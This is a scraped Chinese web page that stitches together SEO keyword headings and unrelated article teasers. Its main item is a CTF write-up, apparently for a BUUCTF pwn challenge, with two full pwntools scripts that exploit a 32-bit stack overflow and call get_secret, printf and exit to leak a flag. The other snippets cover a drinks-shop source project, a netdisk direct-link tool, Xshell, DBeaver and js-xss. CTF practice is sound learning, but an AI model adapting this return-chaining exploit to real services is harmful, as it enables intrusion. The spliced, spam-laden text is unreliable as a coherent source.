企业网站报价单在招聘网站里做电话销售

张小明 2026/3/13 3:18:05
企业网站报价单,在招聘网站里做电话销售,外币信用卡怎么做网站上用,百度ip地址首先checksec检查保护机制#xff1a;-32位程序-仅开启了栈不可执行保护然后使用IDA反汇编工具进行分析#xff1a;main函数中有栈溢出漏洞可利用#xff0c;左边有get_secret函数#xff0c;同时看出v4到栈底的偏移为45#xff0c;原本需要填充49字节的垃圾数据#xff…首先checksec检查保护机制-32位程序-仅开启了栈不可执行保护然后使用IDA反汇编工具进行分析main函数中有栈溢出漏洞可利用左边有get_secret函数同时看出v4到栈底的偏移为45原本需要填充49字节的垃圾数据但是最终实验只需要45个字节的垃圾数据这是get_secret函数内部这里打开了flag.txt文本文件这几行代码的作用就是将flag.txt中的内容写入到fl4g这个变量中去想就是flag了吧但是发现我们还得自己去调用printf函数将fl4g的内容打印出来才能拿到flag这里先拿到flag变量的地址0x080ECA2Dget_secret函数的地址0x080489A0在IDA中找到printf函数的地址0x0804F0A0由于栈溢出执行完printf函数后需要正常退出才能打印出flag的值所以还需用到exit函数的地址同样在IDA中拿到0x0804E660这是exp攻击脚本payload需要先执行get_secret函数将flag读取到对应的变量中后我们再将这个变量的值printf出来from pwn import * context(archi386, oslinux, log_leveldebug) #io process(./pwn) # 在本地运行程序。 # gdb.attach(io) # 启动 GDB io connect(node5.buuoj.cn,26609) # 与在线环境交互。 printf_addr 0x0804F0A0 get_secret_addr 0x080489A0 flag_addr 0x080ECA2D exit_addr 0x0804E660 offset 45 payload ba*offset p32(get_secret_addr) p32(printf_addr) p32(exit_addr) p32(flag_addr) io.sendline(payload) io.interactive()在IDA中一个一个找函数的地址如果嫌太麻烦的话攻击脚本还可以这样写from pwn import * context(archi386, oslinux, log_leveldebug) #io process(./pwn) # 在本地运行程序。 # gdb.attach(io) # 启动 GDB io connect(node5.buuoj.cn,26609) # 与在线环境交互。 elf ELF(./pwn) get_secret_addr elf.symbols[get_secret] printf_addr elf.symbols[printf] exit_addr elf.symbols[exit] flag_addr 0x080ECA2D offset 45 payload ba*offsetp32(get_secret_addr)p32(printf_addr)p32(exit_addr)p32(flag_addr) io.sendline(payload) io.interactive()这是运行结果-成功打印出flag
版权声明:本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!

网站定制开发注意事项个人建网站怎么赚钱

一、关键词 饮料线上商城系统,饮品零售管理系统,饮料销售商城平台 二、作品包含 源码数据库全套环境和工具资源本地部署教程 三、项目技术 前端技术:Html、Css、Js、Vue2.0、Element-ui 后端技术:Java、SpringBoot2.0、MyBatis…

张小明 2026/3/12 20:09:44 网站建设

商城网站开发需求行业网站系统

网盘直链下载终极方案:一键高速下载全平台文件 【免费下载链接】Online-disk-direct-link-download-assistant 可以获取网盘文件真实下载地址。基于【网盘直链下载助手】修改(改自6.1.4版本) ,自用,去推广,…

张小明 2026/3/5 3:49:43 网站建设

龙岗网站建设培训二维码生成器在线制作免费

快速体验 打开 InsCode(快马)平台 https://www.inscode.net输入框内输入如下内容: 开发一个Xshell配置管理工具原型,具备:1. 会话配置导入导出;2. 主题样式批量更换;3. 快捷键自定义模板;4. 配置差异对比功…

张小明 2026/3/5 3:49:44 网站建设

廊坊制作网站公司找不到网站后台怎么办

js-xss安全配置终极指南:构建纵深防御体系的深度解析 【免费下载链接】js-xss Sanitize untrusted HTML (to prevent XSS) with a configuration specified by a Whitelist 项目地址: https://gitcode.com/gh_mirrors/js/js-xss 在当今Web应用安全防护体系中…

张小明 2026/3/5 3:49:45 网站建设

网站推广规划建设银行网银显示网站丢失

1.这道题首先要有一个判断是不是素数的函数,而判断写一个函数就要尽可能的把这个函数写的健壮性要高,(0和1用来判断这个数是不是素数)首先判断小于等于1的数据,肯定不是素数直接返回0,判断2是素数返回1&…

张小明 2026/3/5 3:49:45 网站建设

谁做的四虎网站是多少钱杭州餐饮vi设计

DBeaver数据同步终极指南:掌握跨数据库高效传输技巧 【免费下载链接】dbeaver 项目地址: https://gitcode.com/gh_mirrors/dbe/dbeaver 在当今多元化的数据库环境中,企业常常面临数据孤岛的挑战。MySQL、PostgreSQL、Oracle、SQL Server等不同数…

张小明 2026/3/5 3:49:47 网站建设